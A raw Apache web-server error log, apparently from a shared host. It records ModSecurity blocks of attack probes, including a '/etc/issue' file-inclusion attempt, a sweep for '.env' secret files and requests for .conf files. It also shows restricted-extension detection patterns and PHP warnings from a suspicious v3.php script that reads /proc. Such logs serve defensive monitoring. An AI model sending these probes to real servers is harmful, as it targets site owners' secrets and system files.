PHP Warning:  fileperms(): stat failed for /proc/237/task/237/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 19:35:55.031502 2026] [authz_core:error] [pid 1502013:tid 1502039] [client 47.128.23.34:60226] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Exception/error_log
[Mon May 11 19:35:56.099039 2026] [security2:error] [pid 1501831:tid 1501849] [client 162.62.213.165:58538] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agITfFNddpkriGUb6ZVazwAAARA"]
[Mon May 11 19:36:27.279032 2026] [security2:error] [pid 1502013:tid 1502047] [client 216.73.216.110:29055] ModSecurity: Warning. Matched phrase "etc/issue" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/issue found within ARGS:filesrc: /etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agITm5Yn-x0CHsbEbP2QuQAAAJU"]
[Mon May 11 19:36:27.279928 2026] [security2:error] [pid 1502013:tid 1502047] [client 216.73.216.110:29055] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agITm5Yn-x0CHsbEbP2QuQAAAJU"]
[Mon May 11 19:36:27.373270 2026] [security2:error] [pid 1502013:tid 1502047] [client 216.73.216.110:29055] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agITm5Yn-x0CHsbEbP2QuQAAAJU"]
[Mon May 11 19:36:30.375398 2026] [authz_core:error] [pid 1502013:tid 1502049] [client 47.128.23.39:50728] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/ID3/error_log
[Mon May 11 19:36:51.413230 2026] [security2:error] [pid 1502013:tid 1502040] [client 95.217.109.26:49680] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "facturation.rentparadise.fr"] [uri "/dolibarr-14.0.5/build/makepack-dolibarrmodule.conf"] [unique_id "agITs5Yn-x0CHsbEbP2Q1wAAAI0"]
[Mon May 11 19:36:51.413587 2026] [security2:error] [pid 1502013:tid 1502040] [client 95.217.109.26:49680] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "facturation.rentparadise.fr"] [uri "/dolibarr-14.0.5/build/makepack-dolibarrmodule.conf"] [unique_id "agITs5Yn-x0CHsbEbP2Q1wAAAI0"]
[Mon May 11 19:36:51.414210 2026] [security2:error] [pid 1502013:tid 1502040] [client 95.217.109.26:49680] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "facturation.rentparadise.fr"] [uri "/dolibarr-14.0.5/build/makepack-dolibarrmodule.conf"] [unique_id "agITs5Yn-x0CHsbEbP2Q1wAAAI0"]
[Mon May 11 19:36:53.127779 2026] [security2:error] [pid 1501883:tid 1501886] [client 95.217.109.26:61456] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "facturation.rentparadise.fr"] [uri "/dolibarr-14.0.5/build/makepack-dolibarrmodule.conf"] [unique_id "agITtTP5Q_-MBliRCAxMNAAAAAE"]
[Mon May 11 19:36:53.128184 2026] [security2:error] [pid 1501883:tid 1501886] [client 95.217.109.26:61456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "facturation.rentparadise.fr"] [uri "/dolibarr-14.0.5/build/makepack-dolibarrmodule.conf"] [unique_id "agITtTP5Q_-MBliRCAxMNAAAAAE"]
[Mon May 11 19:36:53.128418 2026] [security2:error] [pid 1501883:tid 1501886] [client 95.217.109.26:61456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "facturation.rentparadise.fr"] [uri "/dolibarr-14.0.5/build/makepack-dolibarrmodule.conf"] [unique_id "agITtTP5Q_-MBliRCAxMNAAAAAE"]
[Mon May 11 19:37:01.142871 2026] [autoindex:error] [pid 1502013:tid 1502036] [client 208.84.100.96:17186] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 19:37:01.147964 2026] [core:error] [pid 1502013:tid 1502036] [client 208.84.100.96:17186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.233887 2026] [autoindex:error] [pid 1511173:tid 1511176] [client 208.84.100.96:65360] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 19:37:01.240299 2026] [core:error] [pid 1511173:tid 1511176] [client 208.84.100.96:65360] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.906835 2026] [security2:error] [pid 1511173:tid 1511193] [client 208.84.100.96:17194] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agITvfjVc-A-CSptvm1X7wAAAFE"]
[Mon May 11 19:37:01.906844 2026] [security2:error] [pid 1516058:tid 1516114] [client 208.84.100.96:17222] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agITvSMeXtzav-mi9SyVOgAAANg"]
[Mon May 11 19:37:01.907015 2026] [security2:error] [pid 1516058:tid 1516114] [client 208.84.100.96:17222] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/backend/.env"] [unique_id "agITvSMeXtzav-mi9SyVOgAAANg"]
[Mon May 11 19:37:01.907019 2026] [security2:error] [pid 1511173:tid 1511193] [client 208.84.100.96:17194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env"] [unique_id "agITvfjVc-A-CSptvm1X7wAAAFE"]
[Mon May 11 19:37:01.907188 2026] [security2:error] [pid 1502013:tid 1502059] [client 208.84.100.96:17216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agITvZYn-x0CHsbEbP2Q5wAAAIk"]
[Mon May 11 19:37:01.907361 2026] [security2:error] [pid 1502013:tid 1502059] [client 208.84.100.96:17216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/app/.env"] [unique_id "agITvZYn-x0CHsbEbP2Q5wAAAIk"]
[Mon May 11 19:37:01.907543 2026] [core:error] [pid 1511173:tid 1511193] [client 208.84.100.96:17194] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.907699 2026] [security2:error] [pid 1511173:tid 1511193] [client 208.84.100.96:17194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agITvfjVc-A-CSptvm1X7wAAAFE"]
[Mon May 11 19:37:01.908070 2026] [core:error] [pid 1516058:tid 1516114] [client 208.84.100.96:17222] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.908227 2026] [security2:error] [pid 1516058:tid 1516114] [client 208.84.100.96:17222] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agITvSMeXtzav-mi9SyVOgAAANg"]
[Mon May 11 19:37:01.908326 2026] [core:error] [pid 1502013:tid 1502059] [client 208.84.100.96:17216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.908510 2026] [security2:error] [pid 1502013:tid 1502059] [client 208.84.100.96:17216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agITvZYn-x0CHsbEbP2Q5wAAAIk"]
[Mon May 11 19:37:01.908576 2026] [core:error] [pid 1516058:tid 1516096] [client 208.84.100.96:17266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.908591 2026] [core:error] [pid 1516058:tid 1516096] [client 208.84.100.96:17266] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.909032 2026] [core:error] [pid 1502013:tid 1502050] [client 208.84.100.96:17234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.909049 2026] [core:error] [pid 1502013:tid 1502050] [client 208.84.100.96:17234] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.909855 2026] [security2:error] [pid 1501831:tid 1501841] [client 208.84.100.96:17210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.production"] [unique_id "agITvVNddpkriGUb6ZVbgwAAAQg"]
[Mon May 11 19:37:01.910028 2026] [security2:error] [pid 1501831:tid 1501841] [client 208.84.100.96:17210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.production"] [unique_id "agITvVNddpkriGUb6ZVbgwAAAQg"]
[Mon May 11 19:37:01.911568 2026] [core:error] [pid 1511173:tid 1511181] [client 208.84.100.96:17190] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.911588 2026] [core:error] [pid 1511173:tid 1511181] [client 208.84.100.96:17190] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.915426 2026] [security2:error] [pid 1501831:tid 1501835] [client 208.84.100.96:17196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.local"] [unique_id "agITvVNddpkriGUb6ZVbhAAAAQI"]
[Mon May 11 19:37:01.915610 2026] [security2:error] [pid 1501831:tid 1501835] [client 208.84.100.96:17196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/.env.local"] [unique_id "agITvVNddpkriGUb6ZVbhAAAAQI"]
[Mon May 11 19:37:01.915640 2026] [core:error] [pid 1501831:tid 1501841] [client 208.84.100.96:17210] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.916636 2026] [security2:error] [pid 1501831:tid 1501841] [client 208.84.100.96:17210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agITvVNddpkriGUb6ZVbgwAAAQg"]
[Mon May 11 19:37:01.916881 2026] [security2:error] [pid 1501883:tid 1501897] [client 208.84.100.96:17220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agITvTP5Q_-MBliRCAxMVgAAAAw"]
[Mon May 11 19:37:01.917033 2026] [security2:error] [pid 1501883:tid 1501897] [client 208.84.100.96:17220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/api/.env"] [unique_id "agITvTP5Q_-MBliRCAxMVgAAAAw"]
[Mon May 11 19:37:01.917814 2026] [core:error] [pid 1501883:tid 1501909] [client 208.84.100.96:17250] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.917832 2026] [core:error] [pid 1501883:tid 1501909] [client 208.84.100.96:17250] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.918590 2026] [core:error] [pid 1501831:tid 1501835] [client 208.84.100.96:17196] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.918853 2026] [core:error] [pid 1501883:tid 1501897] [client 208.84.100.96:17220] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:01.918977 2026] [security2:error] [pid 1501831:tid 1501835] [client 208.84.100.96:17196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agITvVNddpkriGUb6ZVbhAAAAQI"]
[Mon May 11 19:37:01.919034 2026] [security2:error] [pid 1501883:tid 1501897] [client 208.84.100.96:17220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.sitebuilder.totalcloud.fr"] [uri "/index.php"] [unique_id "agITvTP5Q_-MBliRCAxMVgAAAAw"]
[Mon May 11 19:37:02.438602 2026] [autoindex:error] [pid 1501831:tid 1501853] [client 208.84.100.96:17276] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 19:37:02.439069 2026] [core:error] [pid 1501831:tid 1501853] [client 208.84.100.96:17276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:37:03.158859 2026] [autoindex:error] [pid 1511173:tid 1511186] [client 208.84.100.96:17290] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 19:37:03.159425 2026] [core:error] [pid 1511173:tid 1511186] [client 208.84.100.96:17290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790191/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790191/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
